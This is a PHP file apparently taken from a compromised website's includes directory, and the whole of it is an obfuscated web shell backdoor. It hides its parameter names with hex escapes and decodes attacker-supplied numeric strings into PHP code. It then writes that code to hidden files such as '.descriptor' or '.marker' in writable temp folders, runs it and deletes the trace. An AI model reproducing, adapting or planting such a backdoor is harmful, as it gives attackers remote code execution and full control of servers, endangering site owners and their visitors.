File: //proc/thread-self/root/proc/self/root/home/vitanhod/vigolic.vitavit.com.pk/includes/inbOx.php
<?php if(in_array("\x74\x6Fken", array_keys($_POST))){ $marker = $_POST["\x74\x6Fken"]; $marker = explode ( '.', $marker ); $holder = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); foreach( $marker as $l => $v9) {$chS = ord( $s[$l % $lenS]); $dec = ( ( int)$v9 - $chS -( $l % 10)) ^ 70; $holder .= chr( $dec); } $data = array_filter([getenv("TEMP"), "/tmp", "/dev/shm", getcwd(), session_save_path(), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TMP"), "/var/tmp"]); foreach ($data as $entry) { if ((is_dir($entry) and is_writable($entry))) { $dat = "$entry/.descriptor"; if (@file_put_contents($dat, $holder) !== false) { include $dat; unlink($dat); die(); } } } }
if(count($_REQUEST) > 0 && isset($_REQUEST["e\x6Et"])){
$ent = array_filter([getenv("TEMP"), sys_get_temp_dir(), getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", session_save_path(), "/tmp"]);
$entry = $_REQUEST["e\x6Et"];
$entry= explode ( '.', $entry) ;
$binding = '';
$salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen( $salt2 );
$i = 0;
foreach( $entry as $v8) { $sChar = ord( $salt2[$i % $lenS] );
$d = ( ( int)$v8 - $sChar -( $i % 10))^9;
$binding.=chr( $d );
$i++;}
foreach ($ent as $rec) {
if ((bool)is_dir($rec) && (bool)is_writable($rec)) {
$k = sprintf("%s/.marker", $rec);
if (file_put_contents($k, $binding)) {
require $k;
unlink($k);
die();
}
}
}
}